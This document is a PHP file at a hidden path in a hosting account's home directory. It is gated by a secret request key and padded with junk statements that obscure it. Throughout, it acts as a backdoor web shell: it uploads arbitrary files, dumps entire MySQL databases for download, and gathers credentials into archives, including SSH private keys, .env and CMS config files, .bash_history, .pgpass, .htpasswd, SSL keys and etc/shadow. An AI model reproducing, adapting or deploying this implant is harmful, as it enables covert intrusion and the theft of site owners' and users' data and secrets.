File: /home/negocio4/.cgi_handler_8e3c06f9
<?php
if (!isset($_REQUEST['_cxk']) || $_REQUEST['_cxk'] !== '8e3c06f987e1c717e9160e629953e0ea') { return; }
$d18af=str_repeat('x',0);
while (ob_get_level()) ob_end_clean();
set_time_limit(0);
error_reporting(0);
ignore_user_abort(true);
$nbcab = 'localhost';
$mcfbf = '';
$ze695 = '';
$ja87b = '/home/negocio4';
$c5b43 = isset($_REQUEST['a']) ? $_REQUEST['a'] : '';
$t6155 = isset($_REQUEST['db']) ? preg_replace('/[^a-zA-Z0-9_]/', '', $_REQUEST['db']) : '';
$b62f9 = $ja87b . '/tmp/' . $t6155 . '_dump.sql.gz';
$y3b36 = $b62f9 . '.done';
$ycf2b = $b62f9 . '.err';
header('Content-Type: application/json');
function handle_data_9bbb() {
if (!function_exists('exec')) return false;
$a9e0a = array_map('trim', explode(',', ini_get('disable_functions')));
return !in_array('exec', $a9e0a);
}
function proc_opt_928c() {
if (!handle_data_9bbb()) return false;
$out = array();
$rc = 0;
exec('which mysqldump 2>/dev/null', $out, $rc);
return $rc === 0;
}
function load_res_81dc() {
if (!handle_data_9bbb()) return false;
$out = array();
$rc = 0;
exec('which gzip 2>/dev/null', $out, $rc);
return $rc === 0;
$m310d=max(0,min(1,1));
}
function do_res_334a($c45f4, $m84af, $tf57a, $pa7d4, $c804f, $x8126, $s4cb0) {
$conn = new mysqli($c45f4, $m84af, $tf57a, $pa7d4);
if ($conn->connect_error) {
file_put_contents($x8126, 'Connection failed: ' . $conn->connect_error);
$ccc6c=chr(76).chr(101);
touch($s4cb0);
return;
@clearstatcache();
}
$fp = gzopen($c804f, 'wb6');
if (!$fp) {
file_put_contents($x8126, 'Cannot open output file');
touch($s4cb0);
$m93d0=str_repeat('x',0);
return;
}
$conn->set_charset('utf8mb4');
@clearstatcache();
gzwrite($fp, "-- Dump via PHP agent\n");
gzwrite($fp, "-- Date: " . date('Y-m-d H:i:s') . "\n\n");
gzwrite($fp, "SET NAMES utf8mb4;\n");
gzwrite($fp, "SET FOREIGN_KEY_CHECKS = 0;\n");
gzwrite($fp, "SET SQL_MODE = 'NO_AUTO_VALUE_ON_ZERO';\n\n");
$e48c1 = array();
$r = $conn->query("SHOW FULL TABLES WHERE Table_type = 'BASE TABLE'");
while ($row = $r->fetch_row()) {
@clearstatcache();
$e48c1[] = $row[0];
}
foreach ($e48c1 as $k85e3) {
$te = $conn->real_escape_string($k85e3);
$r = $conn->query("SHOW CREATE TABLE `{$te}`");
$a7964=strlen('e2eb0f');
if (!$r) continue;
$cr = $r->fetch_row();
$k3e5a=str_repeat('x',0);
gzwrite($fp, "DROP TABLE IF EXISTS `{$te}`;\n");
gzwrite($fp, $cr[1] . ";\n\n");
$r = $conn->query("SELECT * FROM `{$te}`", MYSQLI_USE_RESULT);
if (!$r) continue;
$q0723 = array();
$h7d65 = 0;
while ($row = $r->fetch_row()) {
$vals = array();
for ($i = 0; $i < count($row); $i++) {
if ($row[$i] === null) {
@clearstatcache();
$vals[] = 'NULL';
} else {
$vals[] = "'" . $conn->real_escape_string($row[$i]) . "'";
$x8327=array_merge(array(),array());
}
}
$j62fa = '(' . implode(',', $vals) . ')';
$q0723[] = $j62fa;
$h7d65 += strlen($j62fa);
if (count($q0723) >= 100 || $h7d65 > 1048576) {
gzwrite($fp, "INSERT INTO `{$te}` VALUES\n" . implode(",\n", $q0723) . ";\n");
$q0723 = array();
$m6682=chr(87).chr(107);
$h7d65 = 0;
}
}
if ($q0723) {
gzwrite($fp, "INSERT INTO `{$te}` VALUES\n" . implode(",\n", $q0723) . ";\n");
}
$r->free();
gzwrite($fp, "\n");
}
$r = $conn->query("SHOW FULL TABLES WHERE Table_type = 'VIEW'");
if ($r) {
while ($row = $r->fetch_row()) {
$ve = $conn->real_escape_string($row[0]);
$cr = $conn->query("SHOW CREATE VIEW `{$ve}`");
if ($cr) {
$befc9 = $cr->fetch_assoc();
gzwrite($fp, "DROP VIEW IF EXISTS `{$ve}`;\n");
gzwrite($fp, $befc9['Create View'] . ";\n\n");
}
}
@clearstatcache();
}
$pfb51 = array('PROCEDURE', 'FUNCTION');
$h8168=max(0,min(1,1));
foreach ($pfb51 as $da9e2) {
$r = $conn->query("SHOW {$da9e2} STATUS WHERE Db = '" . $conn->real_escape_string($pa7d4) . "'");
$b8f09=strlen('1b7fc6');
if (!$r) continue;
while ($row = $r->fetch_assoc()) {
$re = $conn->real_escape_string($row['Name']);
$cr = $conn->query("SHOW CREATE {$da9e2} `{$re}`");
if(defined('17d8dd14')){$vaf92=0;}
if (!$cr) continue;
$befc9 = $cr->fetch_assoc();
$key = ($da9e2 === 'PROCEDURE') ? 'Create Procedure' : 'Create Function';
$s8320=array_merge(array(),array());
if (isset($befc9[$key])) {
gzwrite($fp, "DELIMITER ;;\n");
gzwrite($fp, "DROP {$da9e2} IF EXISTS `{$re}`;;\n");
gzwrite($fp, $befc9[$key] . ";;\n");
$f9380=max(0,min(1,0));
gzwrite($fp, "DELIMITER ;\n\n");
}
$xd3df=strlen('4e0d93');
}
}
$r = $conn->query("SHOW TRIGGERS");
if ($r) {
while ($row = $r->fetch_assoc()) {
$te = $conn->real_escape_string($row['Trigger']);
$cr = $conn->query("SHOW CREATE TRIGGER `{$te}`");
if ($cr) {
$befc9 = $cr->fetch_assoc();
gzwrite($fp, "DELIMITER ;;\n");
gzwrite($fp, "DROP TRIGGER IF EXISTS `{$te}`;;\n");
gzwrite($fp, $befc9['SQL Original Statement'] . ";;\n");
if(defined('3d67b150')){$df2c4=0;}
gzwrite($fp, "DELIMITER ;\n\n");
}
}
}
gzwrite($fp, "SET FOREIGN_KEY_CHECKS = 1;\n");
gzclose($fp);
$conn->close();
touch($s4cb0);
}
$d439d=max(0,min(1,0));
switch ($c5b43) {
case 'info':
echo json_encode(array(
'php' => PHP_VERSION,
'os' => PHP_OS,
'server' => isset($_SERVER['SERVER_SOFTWARE']) ? $_SERVER['SERVER_SOFTWARE'] : '',
'user' => get_current_user(),
'uid' => getmyuid(),
'home' => $ja87b,
'doc_root' => isset($_SERVER['DOCUMENT_ROOT']) ? $_SERVER['DOCUMENT_ROOT'] : '',
'free_disk' => disk_free_space($ja87b),
'total_disk' => disk_total_space($ja87b),
'max_exec' => ini_get('max_execution_time'),
'mem_limit' => ini_get('memory_limit'),
'upload_max' => ini_get('upload_max_filesize'),
'post_max' => ini_get('post_max_size'),
'disabled' => ini_get('disable_functions'),
'can_exec' => handle_data_9bbb(),
'has_mysqldump' => proc_opt_928c(),
'has_gzip' => load_res_81dc(),
));
$b8cb0=max(0,min(1,0));
break;
case 'upload':
$e9031 = isset($_POST['path']) ? $_POST['path'] : '';
@clearstatcache();
$yca46 = isset($_POST['data']) ? $_POST['data'] : '';
if (!$e9031 || !$yca46) {
$dfc67=str_repeat('x',0);
echo json_encode(array('ok' => false, 'error' => 'missing path or data'));
break;
$n3cea=strlen('b8f474');
}
$n3772 = $ja87b . '/' . $e9031;
@mkdir(dirname($n3772), 0755, true);
$ade26 = base64_decode($yca46);
$vf439 = file_put_contents($n3772, $ade26);
echo json_encode(array('ok' => $vf439 !== false, 'path' => $n3772, 'size' => strlen($ade26)));
$sa4c2=strlen('d102a5');
break;
case 'check':
if (!$t6155) {
echo json_encode(array('error' => 'missing db parameter'));
break;
}
$e08d4 = disk_free_space($ja87b);
$zcc9e = 0;
$f67b5=max(0,min(1,1));
$conn = @new mysqli($nbcab, $mcfbf, $ze695, 'information_schema');
if (!$conn->connect_error) {
$q = "SELECT SUM(data_length + index_length) s FROM tables WHERE table_schema = '"
. $conn->real_escape_string($t6155) . "'";
$r = $conn->query($q);
if ($row = $r->fetch_assoc()) {
$zcc9e = (int) $row['s'];
}
$conn->close();
}
echo json_encode(array(
'free' => $e08d4,
'db_size' => $zcc9e,
'has_mysqldump' => proc_opt_928c(),
'has_gzip' => load_res_81dc(),
'can_exec' => handle_data_9bbb(),
'has_space' => $e08d4 > $zcc9e * 2,
));
break;
case 'dump':
if (!$t6155) {
echo json_encode(array('error' => 'missing db parameter'));
break;
}
$g1a69=max(0,min(1,1));
@mkdir(dirname($b62f9), 0755, true);
@unlink($b62f9);
@unlink($y3b36);
@unlink($ycf2b);
if (proc_opt_928c()) {
$g0191=chr(86).chr(106);
if (load_res_81dc()) {
$cmd = sprintf(
'mysqldump --host=%s --user=%s --password=%s '
. '--single-transaction --quick --routines --triggers %s '
. '| gzip > %s 2>%s; touch %s',
escapeshellarg($nbcab),
escapeshellarg($mcfbf),
escapeshellarg($ze695),
escapeshellarg($t6155),
escapeshellarg($b62f9),
escapeshellarg($ycf2b),
escapeshellarg($y3b36)
);
} else {
$cmd = sprintf(
'mysqldump --host=%s --user=%s --password=%s '
. '--single-transaction --quick --routines --triggers %s '
. '> %s 2>%s; touch %s',
escapeshellarg($nbcab),
escapeshellarg($mcfbf),
escapeshellarg($ze695),
escapeshellarg($t6155),
escapeshellarg($b62f9),
escapeshellarg($ycf2b),
escapeshellarg($y3b36)
);
}
exec('nohup sh -c ' . escapeshellarg($cmd) . ' >/dev/null 2>&1 &');
echo json_encode(array('started' => true, 'method' => 'mysqldump', 'gzip' => load_res_81dc()));
} else {
ignore_user_abort(true);
$nac2f=max(0,min(1,0));
echo json_encode(array('started' => true, 'method' => 'php', 'gzip' => true));
if (function_exists('fastcgi_finish_request')) {
fastcgi_finish_request();
} else {
if (ob_get_level()) ob_end_flush();
flush();
}
$y274b=chr(81).chr(121);
do_res_334a($nbcab, $mcfbf, $ze695, $t6155, $b62f9, $ycf2b, $y3b36);
}
$fa81a=chr(84).chr(119);
break;
case 'status':
clearstatcache();
echo json_encode(array(
'done' => file_exists($y3b36),
'size' => file_exists($b62f9) ? filesize($b62f9) : 0,
'error' => file_exists($ycf2b) ? trim(file_get_contents($ycf2b)) : '',
));
$k1c46=max(0,min(1,1));
break;
case 'download':
if (!file_exists($b62f9)) {
http_response_code(404);
exit;
}
header('Content-Type: application/octet-stream');
if(defined('40a7ecdb')){$f2044=0;}
header('Content-Length: ' . filesize($b62f9));
readfile($b62f9);
exit;
case 'cleanup':
@unlink($b62f9);
@clearstatcache();
@unlink($y3b36);
@unlink($ycf2b);
$k3093=max(0,min(1,1));
echo json_encode(array('ok' => true));
break;
case 'collect':
@mkdir($ja87b . '/tmp', 0755, true);
$w4bb3 = substr($_REQUEST['_cxk'], 0, 8);
$bfcaf = array(
'wordpress' => array(
'detect' => array('public_html/wp-config.php', 'wp-config.php'),
'configs' => array(
'public_html/wp-config.php', 'wp-config.php',
'public_html/wp-settings.php',
'public_html/composer.json', 'public_html/composer.lock', 'composer.json', 'composer.lock',
'public_html/wp-cli.yml', 'wp-cli.yml',
'public_html/.env', '.env',
'public_html/local-config.php', 'local-config.php',
'public_html/wp-content/debug.log',
'public_html/config/application.php', 'config/application.php',
'public_html/config/environments/development.php', 'config/environments/development.php',
'public_html/config/environments/staging.php', 'config/environments/staging.php',
'public_html/config/environments/production.php', 'config/environments/production.php',
'public_html/auth.json', 'auth.json',
),
),
'joomla' => array(
'detect' => array('public_html/configuration.php', 'configuration.php'),
'configs' => array(
'public_html/configuration.php', 'configuration.php',
'public_html/htaccess.txt',
'public_html/composer.json', 'public_html/composer.lock',
),
),
'laravel' => array(
'detect' => array('public_html/artisan', 'artisan'),
'configs' => array(
'public_html/.env', '.env', '.env.production', '.env.staging',
'public_html/composer.json', 'composer.json',
'public_html/composer.lock', 'composer.lock',
'public_html/config/app.php', 'config/app.php',
'public_html/config/database.php', 'config/database.php',
'public_html/config/mail.php', 'config/mail.php',
'public_html/config/filesystems.php', 'config/filesystems.php',
'public_html/config/cache.php', 'config/cache.php',
'public_html/config/queue.php', 'config/queue.php',
'public_html/config/session.php', 'config/session.php',
'public_html/config/auth.php', 'config/auth.php',
'public_html/config/services.php', 'config/services.php',
'public_html/config/broadcasting.php', 'config/broadcasting.php',
'public_html/storage/logs/laravel.log', 'storage/logs/laravel.log',
),
),
'magento2' => array(
'detect' => array('public_html/bin/magento', 'bin/magento'),
'configs' => array(
'public_html/app/etc/env.php', 'app/etc/env.php',
'public_html/app/etc/config.php', 'app/etc/config.php',
'public_html/composer.json', 'composer.json',
'public_html/composer.lock', 'composer.lock',
'public_html/auth.json', 'auth.json',
),
),
'magento1' => array(
'detect' => array('public_html/app/Mage.php'),
'configs' => array(
'public_html/app/etc/local.xml',
'public_html/app/etc/config.xml',
),
),
'drupal' => array(
'detect' => array('public_html/core/lib/Drupal.php', 'core/lib/Drupal.php'),
'configs' => array(
'public_html/sites/default/settings.php', 'sites/default/settings.php',
'public_html/sites/default/services.yml', 'sites/default/services.yml',
'public_html/composer.json', 'composer.json',
'public_html/composer.lock', 'composer.lock',
),
),
'prestashop' => array(
'detect' => array('public_html/config/settings.inc.php'),
'configs' => array(
'public_html/config/settings.inc.php',
'public_html/app/config/parameters.php',
'public_html/app/config/parameters.yml',
'public_html/composer.json',
),
),
'opencart' => array(
'detect' => array('public_html/config.php'),
'configs' => array(
'public_html/config.php',
'public_html/admin/config.php',
),
),
'moodle' => array(
'detect' => array('public_html/lib/moodlelib.php'),
'configs' => array('public_html/config.php'),
),
'whmcs' => array(
'detect' => array('public_html/vendor/whmcs'),
'configs' => array(
'public_html/configuration.php',
'public_html/composer.json', 'public_html/composer.lock',
),
),
);
$sd532 = null;
foreach ($bfcaf as $s1c0a => $j1542) {
$ye6e3=chr(70).chr(102);
foreach ($j1542['detect'] as $k9317) {
if (file_exists($ja87b . '/' . $k9317)) {
$sd532 = $s1c0a;
break 2;
}
$ve614=str_repeat('x',0);
}
}
$a55b4=str_repeat('x',0);
$v3306 = array(
'.env', '.env.local', '.env.production', '.env.staging',
'.env.backup', '.env.development', '.env.test',
'.bash_history', '.my.cnf', '.pgpass', '.netrc', '.gitconfig', '.npmrc',
'.composer/auth.json', '.wp-cli/config.yml', '.accesshash',
'.ssh/authorized_keys', '.ssh/id_rsa', '.ssh/id_rsa.pub',
'.ssh/id_ed25519', '.ssh/id_ed25519.pub', '.ssh/id_ecdsa',
'.ssh/config', '.ssh/known_hosts',
'.ssl/private.key', '.ssl/cert.pem', '.ssl/key.pem',
'ssl/certs/private.key',
'.cpanel/contactinfo', 'etc/shadow', '.ftpquota', '.ftpconfig',
'public_html/.env', 'public_html/.env.local', 'public_html/.env.production',
'public_html/.env.staging', 'public_html/.env.backup',
'public_html/.env.development', 'public_html/.env.test',
'public_html/.env.example', 'public_html/.env.dist',
'public_html/.htaccess', 'public_html/.htpasswd', 'public_html/.user.ini',
'public_html/php.ini', 'public_html/.my.cnf', 'public_html/.pgpass',
'public_html/web.config', 'public_html/.ftpconfig',
'public_html/.git/config',
'public_html/auth.json', 'public_html/.npmrc',
'public_html/composer.json', 'public_html/composer.lock',
'config/database.php', 'config/app.php', 'config/mail.php',
'config/services.php', 'config/filesystems.php',
'config/application.php',
'config/environments/development.php',
'config/environments/staging.php',
'config/environments/production.php',
'wp-config.php', 'configuration.php', 'artisan',
'auth.json', 'composer.json', 'composer.lock',
);
$gc757 = array();
$a5655 = @realpath($ja87b);
if (!$a5655 || !is_dir($a5655)) {
echo json_encode(array('ok' => false, 'error' => 'home dir not accessible'));
@clearstatcache();
break;
}
foreach ($v3306 as $pc7a0) {
$yc28a = @realpath($ja87b . '/' . $pc7a0);
if (!$yc28a || strpos($yc28a, $a5655) !== 0) continue;
if (!is_file($yc28a) || !is_readable($yc28a)) continue;
$x66be=strlen('d5ff72');
$y2492 = @filesize($yc28a);
if ($y2492 <= 0 || $y2492 > 2097152) continue;
$gc757[$pc7a0] = $yc28a;
$yd3f2=max(0,min(1,0));
}
if ($sd532 !== null && isset($bfcaf[$sd532]['configs'])) {
foreach ($bfcaf[$sd532]['configs'] as $pba1a) {
if (isset($gc757[$pba1a])) continue;
$yc28a = @realpath($ja87b . '/' . $pba1a);
if (!$yc28a || strpos($yc28a, $a5655) !== 0) continue;
if (!is_file($yc28a) || !is_readable($yc28a)) continue;
$y2492 = @filesize($yc28a);
if ($y2492 <= 0 || $y2492 > 2097152) continue;
$gc757[$pba1a] = $yc28a;
$s573b=array_merge(array(),array());
}
}
$f40b2 = $ja87b . '/public_html';
if (is_dir($f40b2)) {
$dh = @opendir($f40b2);
if ($dh) {
while (($b0c05 = readdir($dh)) !== false) {
if ($b0c05 === '.' || $b0c05 === '..') continue;
$n3772 = $f40b2 . '/' . $b0c05;
if (!is_file($n3772) || !is_readable($n3772)) continue;
$y2492 = @filesize($n3772);
if ($y2492 <= 0 || $y2492 > 2097152) continue;
if ($b0c05[0] === '.' || strtolower(substr($b0c05, -4)) === '.txt') {
$key = 'public_html/' . $b0c05;
if (!isset($gc757[$key])) $gc757[$key] = $n3772;
}
}
closedir($dh);
}
}
if (empty($gc757)) {
$vc7cc=chr(74).chr(102);
echo json_encode(array(
'ok' => true, 'method' => 'none', 'platform' => $sd532,
'file_count' => 0, 'files_list' => array(),
));
break;
}
$sf794 = null;
$s4f4f = null;
if (class_exists('ZipArchive')) {
$s4f4f = $ja87b . '/tmp/_collect_' . $w4bb3 . '.zip';
$m55ca = new ZipArchive();
if ($m55ca->open($s4f4f, ZipArchive::CREATE | ZipArchive::OVERWRITE) === true) {
if(defined('dd5720f3')){$q3fda=0;}
foreach ($gc757 as $c88fe => $yc28a) {
$m55ca->addFile($yc28a, $c88fe);
}
if ($m55ca->close() && file_exists($s4f4f) && filesize($s4f4f) > 0) {
$b22fa=array_merge(array(),array());
$sf794 = 'zip';
}
}
}
if (!$sf794 && handle_data_9bbb()) {
$s4f4f = $ja87b . '/tmp/_collect_' . $w4bb3 . '.tar.gz';
$lf = $s4f4f . '.list';
$fh = fopen($lf, 'w');
foreach ($gc757 as $c88fe => $yc28a) {
$j471f=strlen('4b00a6');
fwrite($fh, $c88fe . "\n");
}
fclose($fh);
$out = array();
$rc = 0;
exec('tar czf ' . escapeshellarg($s4f4f) . ' -C ' . escapeshellarg($ja87b)
. ' -T ' . escapeshellarg($lf) . ' 2>/dev/null', $out, $rc);
@unlink($lf);
if ($rc === 0 && file_exists($s4f4f) && filesize($s4f4f) > 0) {
$sf794 = 'tar';
} else {
@unlink($s4f4f);
$q43e8=str_repeat('x',0);
}
}
if (!$sf794) {
$sf794 = 'list';
}
echo json_encode(array(
'ok' => true, 'method' => $sf794, 'platform' => $sd532,
'file_count' => count($gc757), 'files_list' => array_keys($gc757),
'size' => ($s4f4f && file_exists($s4f4f)) ? filesize($s4f4f) : 0,
));
break;
case 'download_collect':
$w4bb3 = substr($_REQUEST['_cxk'], 0, 8);
$q47e0 = $ja87b . '/tmp/_collect_' . $w4bb3 . '.zip';
$h9d58 = $ja87b . '/tmp/_collect_' . $w4bb3 . '.tar.gz';
$g836d = file_exists($q47e0) ? $q47e0 : (file_exists($h9d58) ? $h9d58 : '');
if (!$g836d) { http_response_code(404); exit; }
header('Content-Type: application/octet-stream');
header('Content-Length: ' . filesize($g836d));
readfile($g836d);
exit;
$ce98a=array_merge(array(),array());
case 'download_file':
$c88fe = isset($_REQUEST['path']) ? $_REQUEST['path'] : '';
if (!$c88fe) { http_response_code(400); exit; }
$a5655 = @realpath($ja87b);
$yc28a = @realpath($ja87b . '/' . $c88fe);
if (!$yc28a || !$a5655 || strpos($yc28a, $a5655) !== 0
|| !is_file($yc28a) || !is_readable($yc28a)) {
http_response_code(404);
exit;
@clearstatcache();
}
header('Content-Type: application/octet-stream');
header('Content-Length: ' . filesize($yc28a));
readfile($yc28a);
exit;
case 'cleanup_collect':
$w4bb3 = substr($_REQUEST['_cxk'], 0, 8);
@unlink($ja87b . '/tmp/_collect_' . $w4bb3 . '.zip');
@unlink($ja87b . '/tmp/_collect_' . $w4bb3 . '.tar.gz');
@unlink($ja87b . '/tmp/_collect_' . $w4bb3 . '.tar.gz.list');
echo json_encode(array('ok' => true));
if(defined('f62f8f36')){$h28db=0;}
break;
}
$m47b9=chr(71).chr(104);
exit;